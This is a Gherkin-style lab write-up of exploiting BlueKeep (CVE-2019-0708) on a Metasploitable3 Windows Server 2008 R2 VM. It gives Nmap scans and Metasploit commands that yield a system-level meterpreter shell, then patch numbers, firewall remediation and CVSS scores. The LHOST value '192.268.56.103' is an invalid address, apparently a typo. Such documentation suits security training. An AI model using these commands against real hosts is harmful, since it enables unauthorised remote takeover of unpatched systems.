## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable3 Windows Server 2008 R2
  Category:
    Access Control
  Location:
    192.168.56.107:3389 TCP
  CWE:
    CWE-306: Missing Authentication for Critical Function
  Rule:
    REQ.R265: Restrict access to critical processes
  Goal:
    Gain remote system-level shell access
  Recommendation:
    Ensure to get the latest OS updates and block RDP port (3389)

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Rolling    | 2020.3 x64  |
    | VirtualBox      | 6.1.14      |
    | Metasploit      | 5.0.99-dev  |
    | Nmap            | 7.80        |
  TOE information:
    Given I am runing TOE in a VM at:
    """
    192.168.56.107
    """

  Scenario: Normal use case - Get local system-level shell through admin user
    Given I got any of the valid administrator credentials
    When I log in the TOE
    Then I download the PsExec tool from the site:
    """
    https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
    """
    Then I execute the following command in PsExec folder:
    """
    psexec -i -s CMD
    """
    And I get a system shell[evidence](lsh.png)

  Scenario: Static detection
    Given a closed-source TOE
    Then I cannot get access to the source code

  Scenario: Dynamic detection - Using module to check vulnerability status
    Given an scan to TOE with Nmap:
    """
    nmap -sn 192.168.56.0/24
    """
    Then I get the location of the TOE:
    """
    ...
    Nmap scan report for 192.168.56.107
    Host is up (0.00045s latency).
    ...
    """
    And I scan the TOE 3389 port with Nmap:
    """
    nmap -sV -p 192.168.56.107
    """
    And I check that the port is open:
    """
    ...
    PORT     STATE SERVICE        VERSION
    3389/tcp open  ms-wbt-server
    MAC Address: 08:00:27:7A:33:E9 (Oracle VirtualBox virtual NIC)
    ...
    """
    Given an infamous exploit found by the U.K. NCSC called "BlueKeep"
    When I execute msfconsole
    And I search the BlueKeep exploit:
    """
    search bluekeep
    """
    Then I get the following modules[evidence](modules.png)
    And I can execute the following command:
    """
    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    """
    And I set the target host of the scanner:
    """
    set RHOST 192.168.56.107
    """
    When I run the scanner
    Then I get the output[evidence](scan.png)
    And I can conclude that the TOE is vulnerable to BlueKeep exploit

  Scenario: Exploitation - Gain system-level shell access through BlueKeep
    Given target host 192.168.56.107:3389
    And attacker host 192.168.56.103:4444
    Then I can execute the following module in msfconsole:
    """
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    """
    And I set the local and remote host:
    """
    set LHOST 192.268.56.103
    set RHOST 192.168.56.107
    """
    When I search for exploit targets[evidence](targets.png)
    Then I select the target 2
    And I run the exploit with the command:
    """
    exploit
    """
    And I get the output[evidence](exploit.png)
    And I execute the shell in meterpreter
    And I can verify the access level of the shell prompt[evidence](shell.png)
    Then I can conclude that it's possible to gain system-level shell access

  Scenario: Remediation - Update OS and block port 3389 (RDP)
    Given I have patched the TOE with the OS updates:
    """
    KB4499164
    KB4499175
    """
    When I block a port in Windows Firewall[evidence](closeport.png)
    And I specify the port 3389 to be blocked[evidence](cp3389.png)
    Then I check the port 3389 with Nmap[evidence](filtered.png)
    And I run the scanner module[evidence](patched.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.8/10 (Critical) - /AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.1/10 (Critical) - /E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.1/10 (Critical) - /MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-10-26}
